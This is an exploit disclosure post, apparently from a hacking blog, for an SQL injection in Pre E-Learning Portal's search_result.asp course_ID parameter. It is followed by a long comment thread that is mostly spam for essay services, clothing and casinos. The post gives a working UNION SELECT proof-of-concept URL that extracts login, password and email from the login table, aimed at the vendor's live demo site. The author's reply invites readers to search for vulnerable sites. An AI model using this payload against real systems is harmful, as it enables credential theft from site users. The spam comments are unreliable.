Pre E-Learning Portal SQL Injection Vuln


[o] Pre E-Learning Portal SQL Injection Vulnerability
Software : Pre E-Learning Portal
Vendor : http://www.preproject.com/
Demo : http://www.preprojects.com/elearning/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/


[o] Vulnerable file
search_result.asp [ course_ID ]


[o] Exploit
http://localhost/elearning/search_result.asp?courses=1&course_ID=[SQL]


[o] Proof of Concept
http://www.preprojects.com/elearning/search_result.asp?courses=1&course_ID=194+and+1=0+union+all+select+1,(login%2B':'%2Bpassword%2B':'%2Bemail),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+[login]#

u cant see the result?? press ctrl+u and scroll down.. :p

big thanks to Vrs-hCk



33 Responses so far.

  1. Very nice. Thanks for sharing this and thanks to Vrs-hCk. I'm sure that lost of people will be happy with this.

  2. NoGe says:

    a lost of people will be search for vulnerable site too.. :))

  3. You sure that lost of people will be happy with this.

  4. I have been really glad after reading this blog as the knowledge which has been given via this blog is simply tremendous. I would congratulate and appreciate the blogger for doing this much hard work.

  5. Thanks for making such a cool post which is really very well written.I will be referring my friends about this article.Keep up your excellency and efficiency in this levels.
    Dissertation Writers | dissertation proposal | buy dissertation

  6. I feel strongly about it and love learning more on this topic. If possible, as you gain expertise, would you mind updating your blog with more information? It is extremely helpful for me.

  7. Hair says:

    Very informative. I really enjoyed while reading your post.

    Debt Relief

  8. This information is very good for me . Very spacial thanks to Author of this article

  9. good to read this article, this is very informative for me.

  10. this post is very informative and helpful for me.i am happy to see this effort and great knowledge about subject.
    essay writers custom essays writing

  11. This is winter jackets a really excellent study for me, Must acknowledge that you are one of the best web owners I ever saw. winter coats

  12. juliawells says:

    Well that's Pre E-Learning Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
    Teamwear Football

  13. I just revenge of the fallen jacket discovered your website and desired to say that I have really experienced surfing around your posts shia la beouf clothing

  14. When i found your current weblog site on the search engines and also test just a few within your quick discussions. Proceed to maintain upward this very good use. When i simply additional upward your current Feed for you to my own WINDOWS LIVE MESSENGER Information Viewer.

  15. Well the Pre E-Learning Portal is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements to the search_result.asp script using the course_ID parameter.
    Athletic Clothing | Mens Golf Apparel | Adidas Polo | Izod

  16. sandrasteve says:

    The SQL injection vulnerability in search_result.asp in Pre Projects Pre E-Learning Portal allows remote attackers to execute arbitrary SQL commands via the course_ID parameter. thanks for the share the sharing this great and very informative post with us.
    Where to Sell Gold | Cash Gold | Price of gold per gram

  17. I believe this is a great site, you are working great on the content and quality of this site at the same time.

  18. wad jason says:

    This really is an awesome post, I’m happy I recently found.I am looking forward for your next post.
    essay writing service in uk

  19. jakhoz says:

    I hardly ever write comments on blogs, but your article urged me to praise your blog. Thanks for the read, I will surely favorite your site and check in occasionally.

    essay writing help | essay writing service | cheap essay writing | affordable essay writing

  20. jakhoz says:

    Awesome content, beneficial give good results, now I am aware that which you guys have been doing all this time.
    do my essay for me | write my essay

  21. Great post... very informative for me. Thanks for sharing.
    __________________________
    Cheap Essay | Essay Blog

  22. I am really love your website, it is so great. Of course, welcome to visit our website too.
    -----------------------
    Online Essay

  23. Primary focus of our company is on providing custom written essays. It is our aim to provide you with personalized academic assistance in preparing dissertation proposals, theses, literature reviews, MBA projects or reports.

    UK Essay Writing

  24. the large majority of excellent blogging site http://freeonlinecasinogamesx.webs.com online casino games